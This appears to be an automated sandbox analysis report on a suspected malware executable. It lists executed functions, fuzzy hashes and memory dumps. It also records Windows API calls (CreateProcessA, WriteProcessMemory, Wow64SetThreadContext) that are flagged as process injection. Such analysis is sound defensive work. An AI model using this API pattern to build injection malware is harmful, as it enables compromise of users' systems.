API String ID: 0-2933265366
Opcode ID: 50d992df3f623c0324d8ee2905ad1144fd48123888f36d2914f2fd05fc486dd7
Instruction ID: 7e31610a0111f9e9fbd5bfefc659d2f602604bee040a2fa35bc27a624208cc1c
Opcode Fuzzy Hash: 50d992df3f623c0324d8ee2905ad1144fd48123888f36d2914f2fd05fc486dd7
Instruction Fuzzy Hash: CB015E317805188F8B248F2EC494E2573FEAF89665719426AE502CB2F0DB61DC61CB50

Analysis Process: HaNkyQWPIIzrnC.exePID: 4212, Parent PID: 1040COMMON

Execution Graph

Execution Coverage:	11.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	242
Total number of Limit Nodes:	15

Executed Functions

Function 07665178 Relevance: 8.4, Strings: 6, Instructions: 885COMMON

Download Yara Rule

Strings

(oq, xrefs: 076659E8
(oq, xrefs: 076656A2
(oq, xrefs: 076659DA
,q, xrefs: 07665A60
,q, xrefs: 07665A52
Hq, xrefs: 0766556E

Memory Dump Source

Source File: 00000011.00000002.1355847025.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7660000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID:
String ID: (oq$(oq$(oq$,q$,q$Hq
API String ID: 0-894188343
Opcode ID: ec157f97c9fe01d6b50ef1e0a224b15977c1d002ca4fd7452589eea6563ab167
Instruction ID: ad6dce05827f93492cd590aac2212f78e6c2e40b5c6db8688772b4dfb144f032
Opcode Fuzzy Hash: ec157f97c9fe01d6b50ef1e0a224b15977c1d002ca4fd7452589eea6563ab167
Instruction Fuzzy Hash: 85725CB0A002199FDB14DF69D889AAEBBB6FF88300F548169E447AB351EB34DD51CF50

Function 076685A0 Relevance: 6.1, Strings: 4, Instructions: 1085COMMON

Download Yara Rule

Strings

4'q, xrefs: 076685C4
4'q, xrefs: 076686CB
(oq, xrefs: 07668C88
4'q, xrefs: 07669283

Memory Dump Source

Source File: 00000011.00000002.1355847025.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7660000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID:
String ID: (oq$4'q$4'q$4'q
API String ID: 0-2528434116
Opcode ID: 384cefd9b58486b0e007373a4aad9304dd34e20ad59195319f2231565fa3d9b1
Instruction ID: 6462d0e7684d48e858e91a7836d6c8bed17de5d8e00a99b4493519b6761dc028
Opcode Fuzzy Hash: 384cefd9b58486b0e007373a4aad9304dd34e20ad59195319f2231565fa3d9b1
Instruction Fuzzy Hash: C6A25EB0A0020ADFCB15CF68C988AAEBBB6FF89310F558559E806DB351D734ED85CB51

Function 07662106 Relevance: 1.8, Strings: 1, Instructions: 561COMMON

Download Yara Rule

Strings

D, xrefs: 0766210B

Memory Dump Source

Source File: 00000011.00000002.1355847025.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7660000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID:
String ID: D
API String ID: 0-2746444292
Opcode ID: f28aec886f41dd53824416255fca9a0f8bd8edd1f87e75123d4cc6765e526a4e
Instruction ID: 4270c199e076de358fa8bc4e0a44f99aff8679561e26e90478ae834337fa9a4b
Opcode Fuzzy Hash: f28aec886f41dd53824416255fca9a0f8bd8edd1f87e75123d4cc6765e526a4e
Instruction Fuzzy Hash: CA52C574A102299FDB64DF24C899B9DB7B2BF89710F1081D9D54EAB364CB34AE81CF50

Function 0766C0F8 Relevance: .5, Instructions: 506COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1355847025.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7660000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24d92501bb293ee021f59158e1ab1c708be39b821d08e56baacb8b7bff603860
Instruction ID: ba5d7d510fa86b1eb0a2b6b0e8a539dc8d785d2180fd48dc3b9078e08d01ab3c
Opcode Fuzzy Hash: 24d92501bb293ee021f59158e1ab1c708be39b821d08e56baacb8b7bff603860
Instruction Fuzzy Hash: C84281B4E11219CFDB54CFA9C984B9DBBB2FF48310F5481A9E809A7355DB30AA85CF50

Function 0766AA28 Relevance: .5, Instructions: 482COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1355847025.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7660000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e5b390390929b369c2e840add809eb8fbfe8673e779f4c916d4b3bbf2a40257
Instruction ID: ec23fe6f4d6acf3c31baa475466a39d820ada6528bdaa841f46d4b997205188a
Opcode Fuzzy Hash: 9e5b390390929b369c2e840add809eb8fbfe8673e779f4c916d4b3bbf2a40257
Instruction Fuzzy Hash: 1132D1B4900219CFEB50DFA9C584A8EFBB6FF88315F55C19AD449AB211CB30D981CFA5

Function 0766C0E8 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1355847025.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7660000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0073c123e14f5baf2267f702f2f6835640c359235264d0b868f004038a20dd9c
Instruction ID: b165db81413f25234c0ebc36f278e4dae54bcbd0f04060c0aabdcf0ca6dccade
Opcode Fuzzy Hash: 0073c123e14f5baf2267f702f2f6835640c359235264d0b868f004038a20dd9c
Instruction Fuzzy Hash: 2961A5B5E11618CFDB14CFAAD984B9DBBB2FF88300F1481A9D809A7354DB35A945CF50

Function 0766AA18 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1355847025.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7660000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa1fef003445a1947fb3a8f57493d60542c3ca4ff45c7570318f79f78ab26237
Instruction ID: 5ca8d3c1b14cf290a80a44b5fd97ee47f7f8274e58dcb4789767112d29ebc2e1
Opcode Fuzzy Hash: fa1fef003445a1947fb3a8f57493d60542c3ca4ff45c7570318f79f78ab26237
Instruction Fuzzy Hash: 094108B1E006198FEB58DFAAC94179EFBF3BF88300F14D0A9D45DA6214EB301A858F51

Function 07665EC8 Relevance: 10.5, Strings: 8, Instructions: 469
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(oq, xrefs: 07665FDD
(oq, xrefs: 0766607A
,q, xrefs: 07666358
(oq, xrefs: 07665EF6
(oq, xrefs: 07665FB1
(oq, xrefs: 076663D7
(oq, xrefs: 076663C7
,q, xrefs: 07666368

Memory Dump Source

Source File: 00000011.00000002.1355847025.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7660000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID:
String ID: (oq$(oq$(oq$(oq$(oq$(oq$,q$,q
API String ID: 0-2212926057
Opcode ID: 9c5014a4be6e62c2f55a4ca4bcec0d10ff58a1747a4d425b729e11ce6f7e0af3
Instruction ID: e93ddfcfc524039b2da2626de7efd19d6400c7c76f5367fc6d6d855334efe92c
Opcode Fuzzy Hash: 9c5014a4be6e62c2f55a4ca4bcec0d10ff58a1747a4d425b729e11ce6f7e0af3
Instruction Fuzzy Hash: 2D126DB0A00209DFCB14CF69E588A9EBBF2BF49314F948569E44ADB361DB31ED45CB50

Function 07665EB9 Relevance: 5.3, Strings: 4, Instructions: 269
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(oq, xrefs: 07665FDD
(oq, xrefs: 0766607A
(oq, xrefs: 07665EF6
(oq, xrefs: 07665FB1

Memory Dump Source

Source File: 00000011.00000002.1355847025.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7660000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID:
String ID: (oq$(oq$(oq$(oq
API String ID: 0-3853041632
Opcode ID: 8c20a5cceb4d0a20be64bbd56a757c75c9c7ee5996ea00e4da3f4306ba31b0e1
Instruction ID: 28864d5a47c9d67940576eca91c471cca3bc9dea6a68e84783fb9736c627555c
Opcode Fuzzy Hash: 8c20a5cceb4d0a20be64bbd56a757c75c9c7ee5996ea00e4da3f4306ba31b0e1
Instruction Fuzzy Hash: C6C15BB0A002099FCB14CF69D988A9EBBF6BF49304F948569E456EB361D731ED41CF90

Function 07669AF8 Relevance: 4.1, Strings: 3, Instructions: 370
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(oq, xrefs: 07669B31
(oq, xrefs: 0766A141
(oq, xrefs: 07669B55

Memory Dump Source

Source File: 00000011.00000002.1355847025.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7660000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID:
String ID: (oq$(oq$(oq
API String ID: 0-3376450984
Opcode ID: 4ecb69548aef23e872d2655a2c9c16a90491911cc47476ea7a1d86b46ec30ae0
Instruction ID: b8142799b815c96b49ef88a1e5217450406cc4addde7b085d582b9666c766a09
Opcode Fuzzy Hash: 4ecb69548aef23e872d2655a2c9c16a90491911cc47476ea7a1d86b46ec30ae0
Instruction Fuzzy Hash: 36F13BB0A0061A9FCB11CF95C588DAEBBF6FF88300F9AC559E95697250D734F941CB90

Function 0766C06A Relevance: 3.9, Strings: 3, Instructions: 112
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

k, xrefs: 0766BFD6
kl7, xrefs: 0766C0BD
k^, xrefs: 0766C06B

Memory Dump Source

Source File: 00000011.00000002.1355847025.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7660000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID:
String ID: k$k^$kl7
API String ID: 0-3396992388
Opcode ID: b5ce2721b69bd836b2ad5df76b0a145b32708831ad5cf5345b977553ac193ce6
Instruction ID: 32bb2eef76b1cd66c24cecb4132c23d807e3731786b4f3c72e0c4f8853ab7c56
Opcode Fuzzy Hash: b5ce2721b69bd836b2ad5df76b0a145b32708831ad5cf5345b977553ac193ce6
Instruction Fuzzy Hash: 6941BEB1C04758CFEB11DFA9C8597DEBFF0AF09300F54409AD885AB351E2B55885CBA2

Function 07664708 Relevance: 2.8, Strings: 2, Instructions: 321
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hq, xrefs: 076647F3
Hq, xrefs: 07664826

Memory Dump Source

Source File: 00000011.00000002.1355847025.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7660000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID:
String ID: Hq$Hq
API String ID: 0-925789375
Opcode ID: 8b36a16505a9a7768a5c6134238ac76a3c70704a11b790de7b31ca70d5fbc18e
Instruction ID: 953bad4cef3a86f8ccc480bd5e4c3e37fcc64bc3ecaecf28c284d14f5f7c7766
Opcode Fuzzy Hash: 8b36a16505a9a7768a5c6134238ac76a3c70704a11b790de7b31ca70d5fbc18e
Instruction Fuzzy Hash: 50B1CCB07042969FDB159F38C898B7E3FE2AB89250F548529E846CB394DF34CD42CB90

Function 07667860 Relevance: 2.8, Strings: 2, Instructions: 321
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'q, xrefs: 07667879
4'q, xrefs: 0766789F

Memory Dump Source

Source File: 00000011.00000002.1355847025.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7660000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID:
String ID: 4'q$4'q
API String ID: 0-1467158625
Opcode ID: 062737125a4c8069b31f128835fc509ef3e9cbe679ba17b10eaa6815a4f3e5fc
Instruction ID: 921447411e0a1163b96bdf9608501db963242db7f1d9e704a252eaca3414539c
Opcode Fuzzy Hash: 062737125a4c8069b31f128835fc509ef3e9cbe679ba17b10eaa6815a4f3e5fc
Instruction Fuzzy Hash: FFB151F03545028FEB25AA39C45D73937A6EF85618FA8046AE103CF3B5DA25DD42CB91

Function 07664C68 Relevance: 2.7, Strings: 2, Instructions: 228
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

,q, xrefs: 07664D3E
,q, xrefs: 07664D48

Memory Dump Source

Source File: 00000011.00000002.1355847025.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7660000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID:
String ID: ,q$,q
API String ID: 0-1667412543
Opcode ID: c8e3cbf25ffc58cf389c3c755208bbdc40a36a2460e7d804d738acfa62509a8e
Instruction ID: a355fae99211868b60e0960760a01aaf7a05b3a063d16252dbebc71cd46fc079
Opcode Fuzzy Hash: c8e3cbf25ffc58cf389c3c755208bbdc40a36a2460e7d804d738acfa62509a8e
Instruction Fuzzy Hash: 818190B9A10146CFDB54CF69C488A69BFB2BF89604B998169D407DB3A0DF31EA41CB50

Function 056C6A40 Relevance: 2.7, Strings: 2, Instructions: 210
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hq, xrefs: 056C6B08
Hq, xrefs: 056C6B6E

Memory Dump Source

Source File: 00000011.00000002.1354870584.00000000056C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_56c0000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID:
String ID: Hq$Hq
API String ID: 0-925789375
Opcode ID: 1ed109a4a9830f11a9ea2ef6b21c5174f3a0c224db91294563cc631e46c79efe
Instruction ID: f415db81245ea3ea427a572f6d26b8613ebc7a8a2c2dd6a1866ccb454bee69d0
Opcode Fuzzy Hash: 1ed109a4a9830f11a9ea2ef6b21c5174f3a0c224db91294563cc631e46c79efe
Instruction Fuzzy Hash: A9816A70E003189FDB14DFA9C8946AEBBF6FF88300F24816EE409AB354DB749941CB95

Function 056C1ED4 Relevance: 2.7, Strings: 2, Instructions: 162
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 056C25CE
, xrefs: 056C25C7

Memory Dump Source

Source File: 00000011.00000002.1354870584.00000000056C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_56c0000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-227171996
Opcode ID: 220cfee0390b8430dcd3c6e2690eb04ffd2f0b421da884075b59f891f7f6d49c
Instruction ID: f79e9b21dee7d218efef5dfb3e6e1173c3e637ffd0f14845fe43c2c3bc514090
Opcode Fuzzy Hash: 220cfee0390b8430dcd3c6e2690eb04ffd2f0b421da884075b59f891f7f6d49c
Instruction Fuzzy Hash: E1718035920A01CFDB00EF28D495555BBF1FF85304B4186A9E949BB216EF71F988CB80

Function 056C2583 Relevance: 2.7, Strings: 2, Instructions: 159COMMON

Download Yara Rule

Strings

, xrefs: 056C25CE
, xrefs: 056C25C7

Memory Dump Source

Source File: 00000011.00000002.1354870584.00000000056C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_56c0000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-227171996
Opcode ID: 65376d095325d59ef6aa7af0309f88c7acd0ff57f94eb4ce3bf26fb1809f1321
Instruction ID: da056edc69cded6733439a1e29f7b720ff2996839cf75374c5946698ba8fd93f
Opcode Fuzzy Hash: 65376d095325d59ef6aa7af0309f88c7acd0ff57f94eb4ce3bf26fb1809f1321
Instruction Fuzzy Hash: 16718135920A01CFEB01DF28D496655BBF1FF85304B5186A9E949BB316EB71F988CB80

Function 0766B158 Relevance: 2.6, Strings: 2, Instructions: 139COMMON

Download Yara Rule

Strings

Teq, xrefs: 0766B294
Teq, xrefs: 0766B1BC

Memory Dump Source

Source File: 00000011.00000002.1355847025.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7660000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID:
String ID: Teq$Teq
API String ID: 0-2938103587
Opcode ID: 58517fecb2ad5ac8f611d5cdf814d9957e67209fc1440b9632b5ef09bd63c44a
Instruction ID: cd0cf4483319ff1e905761603dbc90cf75cd0c8318ae8ebc5b14b5f911d13c49
Opcode Fuzzy Hash: 58517fecb2ad5ac8f611d5cdf814d9957e67209fc1440b9632b5ef09bd63c44a
Instruction Fuzzy Hash: 6151B4B4E002189FDB08DFA9C994AADFBF2FF88300F148129E815AB354DB715945CF50

Function 0766B148 Relevance: 2.6, Strings: 2, Instructions: 125COMMON

Download Yara Rule

Strings

Teq, xrefs: 0766B294
Teq, xrefs: 0766B1BC

Memory Dump Source

Source File: 00000011.00000002.1355847025.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7660000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID:
String ID: Teq$Teq
API String ID: 0-2938103587
Opcode ID: e8c4b912fabd72683c52bea97f1f1d1f9c5b23310b0d611fcd79ad487271cbb3
Instruction ID: 182468a4046f3965050f0809d84acbdcb19226dd03055222a9643d3f4c5d0414
Opcode Fuzzy Hash: e8c4b912fabd72683c52bea97f1f1d1f9c5b23310b0d611fcd79ad487271cbb3
Instruction Fuzzy Hash: 1251B5B4E102099FDB08DFE9C98469EFBB2FF88300F248129E915AB354DB755946CB50

Function 076676C0 Relevance: 2.6, Strings: 2, Instructions: 103COMMON

Download Yara Rule

Strings

$q, xrefs: 0766777C
$q, xrefs: 0766779F

Memory Dump Source

Source File: 00000011.00000002.1355847025.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7660000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID:
String ID: $q$$q
API String ID: 0-3126353813
Opcode ID: 5a54d4131f4b9bddca9a0977acd616bb485f7585e0d45fcf513e2d460914e399
Instruction ID: 064ef2345808bfc7dc1bd3dac7fa48579e5a038272bf34376cfc12875e1237f1
Opcode Fuzzy Hash: 5a54d4131f4b9bddca9a0977acd616bb485f7585e0d45fcf513e2d460914e399
Instruction Fuzzy Hash: 5B31C1B43142168FDB2A8F35D89873E7F76BB85608FA448AAD053CB391DB64DC41C7A1

Function 09F98B3C Relevance: 1.7, APIs: 1, Instructions: 247processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 09F98D7E

Memory Dump Source

Source File: 00000011.00000002.1356893658.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_9f90000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: dea5a51f07debde995e624c41b20406aa0fda3af4528b797b1ec5cfed3aea841
Instruction ID: 5b312fecfdb117b1b532446d84b230fccb8e7102cb4ed27cdb980294d279e908
Opcode Fuzzy Hash: dea5a51f07debde995e624c41b20406aa0fda3af4528b797b1ec5cfed3aea841
Instruction Fuzzy Hash: 48A16B71D117198FEF24DFA8C841BEEBBB2BF49310F14816AE809A7240DB759985CF91

Function 09F98B48 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 09F98D7E

Memory Dump Source

Source File: 00000011.00000002.1356893658.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_9f90000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 322486a90bc997f67757c7a6d778c8201994de92ad5b017835dd999cd3bcec2a
Instruction ID: b662a2ab021f2da176e3a18e698a2ef8dcba4e2e4fa71224d2f2e60f83ea2f67
Opcode Fuzzy Hash: 322486a90bc997f67757c7a6d778c8201994de92ad5b017835dd999cd3bcec2a
Instruction Fuzzy Hash: 61915A71D117198FEF24DFA8C841BEEBBB2BF49310F14816AE809A7240DB759985CF91

Function 056A2F30 Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 056A3BE2

Memory Dump Source

Source File: 00000011.00000002.1354770671.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_56a0000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 5a3ee5b7dcb4c0e057f05313f3d233f70cb3d916cb4e7fe7ceeaa73b36ced7f5
Instruction ID: ae9ec00abe7d45efb1f7f567616a28c697c8f95e333d0a0102bd309c628fec96
Opcode Fuzzy Hash: 5a3ee5b7dcb4c0e057f05313f3d233f70cb3d916cb4e7fe7ceeaa73b36ced7f5
Instruction Fuzzy Hash: 03519FB1D043499FDB14CF9AC984ADEBBB5BF48310F24852AE819AB214D7759845CF90

Function 056A3AC5 Relevance: 1.6, APIs: 1, Instructions: 114COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 056A3BE2

Memory Dump Source

Source File: 00000011.00000002.1354770671.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_56a0000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 4ecb25506c041d3a37b19dbd55ec3ccb6a1babb781457c29cb84d36e24c36aa3
Instruction ID: 2196dde67b49d92d86615fce9c9d5d3ddaaf323a897f8be91e2ed7e3c1a26c23
Opcode Fuzzy Hash: 4ecb25506c041d3a37b19dbd55ec3ccb6a1babb781457c29cb84d36e24c36aa3
Instruction Fuzzy Hash: 5951BFB5D003099FDB14CFA9C985ADDBBB6BF48310F24852AE819AB310D7759885CF90

Function 056A3084 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 056A6161

Memory Dump Source

Source File: 00000011.00000002.1354770671.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_56a0000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: da6ac2c99a67fcd17ec1d450228d2acbc1429bd37dce97fcb3214e51fbe8c9e4
Instruction ID: 92d99bae52eaec29d2df03257657318eedbbbb609cbafa5bbcfb53ee49195a1c
Opcode Fuzzy Hash: da6ac2c99a67fcd17ec1d450228d2acbc1429bd37dce97fcb3214e51fbe8c9e4
Instruction Fuzzy Hash: 98411CB5A00305DFDB14CF59C488BAABBF5FB88314F248459D519A7321D775AC45CFA0

Function 032173CD Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 03217489

Memory Dump Source

Source File: 00000011.00000002.1351301781.0000000003210000.00000040.00000800.00020000.00000000.sdmp, Offset: 03210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_3210000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 6ef6a42e7e069e23c5d5b57205c36137db646f1e12fa6d1fa3eb520eb64bdaf6
Instruction ID: 10bbd5991569bfe2b3ddf18bec2bdb4fd2aa55a836d342ceb4c30fe7c7db5d3e
Opcode Fuzzy Hash: 6ef6a42e7e069e23c5d5b57205c36137db646f1e12fa6d1fa3eb520eb64bdaf6
Instruction Fuzzy Hash: 3841E0B1C00719CBDB24CFA9C984BDDBBF6BF48304F20846AD408AB255DBB56985CF90

Function 03215F74 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 03217489

Memory Dump Source

Source File: 00000011.00000002.1351301781.0000000003210000.00000040.00000800.00020000.00000000.sdmp, Offset: 03210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_3210000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 71fd05416bcc42e2241e0b31bbb86f685a010d14ecda5404efd59c95a1dbfd15
Instruction ID: 30a0c6ff2c6af0df20330c4cbc38b240a0915b1f49e152938df37a7e88f0d13c
Opcode Fuzzy Hash: 71fd05416bcc42e2241e0b31bbb86f685a010d14ecda5404efd59c95a1dbfd15
Instruction Fuzzy Hash: 0F41E0B0C00719CBDB24CFA9C944BDDBBF6BF89304F20806AD508AB255DBB16985CF90

Function 09F988B8 Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 09F98950

Memory Dump Source

Source File: 00000011.00000002.1356893658.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_9f90000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 24afc596195582769875213b01176afcbb21809e5c616323ca75595351243fa0
Instruction ID: a1ba636627bc79e2a3e72aaebcf3ca7087253d9076c563e630c0af8572a248a1
Opcode Fuzzy Hash: 24afc596195582769875213b01176afcbb21809e5c616323ca75595351243fa0
Instruction Fuzzy Hash: 5C213572D003499FDB14CFA9D885BEEBBF1FF48310F10852AE959A7250C7799940CB61

Function 09F988C0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 09F98950

Memory Dump Source

Source File: 00000011.00000002.1356893658.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_9f90000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: e8d5114119f687f1252aadb1f56879fc8395aad8bbeb8ee888013acfb78e3126
Instruction ID: 71aaa2022afc1faa250a014eff1e91019d0b737d2f09e402f07dc8d9b9f0cdbc
Opcode Fuzzy Hash: e8d5114119f687f1252aadb1f56879fc8395aad8bbeb8ee888013acfb78e3126
Instruction Fuzzy Hash: 02212471D003499FDB10CFAAC881BEEBBF5FF48310F14842AE959A7240C7799944CBA1

Function 09F989A8 Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 09F98A30

Memory Dump Source

Source File: 00000011.00000002.1356893658.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_9f90000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 2a4f068f1c5583e5ad5e942ea4675e282466a5f5626f56dd65c8d47973a62222
Instruction ID: 39b7b6c07446e2dd96ec4e7e47392a22bd228bba7f195c74a8942a98876a2033
Opcode Fuzzy Hash: 2a4f068f1c5583e5ad5e942ea4675e282466a5f5626f56dd65c8d47973a62222
Instruction Fuzzy Hash: 0D21F4B1C003499FDB14CFAAD881BEEBBF5FF88310F54842AE959A7250D7799941CB60

Function 09F98721 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNELBASE(?,00000000), ref: 09F987A6

Memory Dump Source

Source File: 00000011.00000002.1356893658.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_9f90000_HaNkyQWPIIzrnC.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: bad168f7529233b8d37a4e77efb00e4940415190d8e6f5357551382e1e79488d
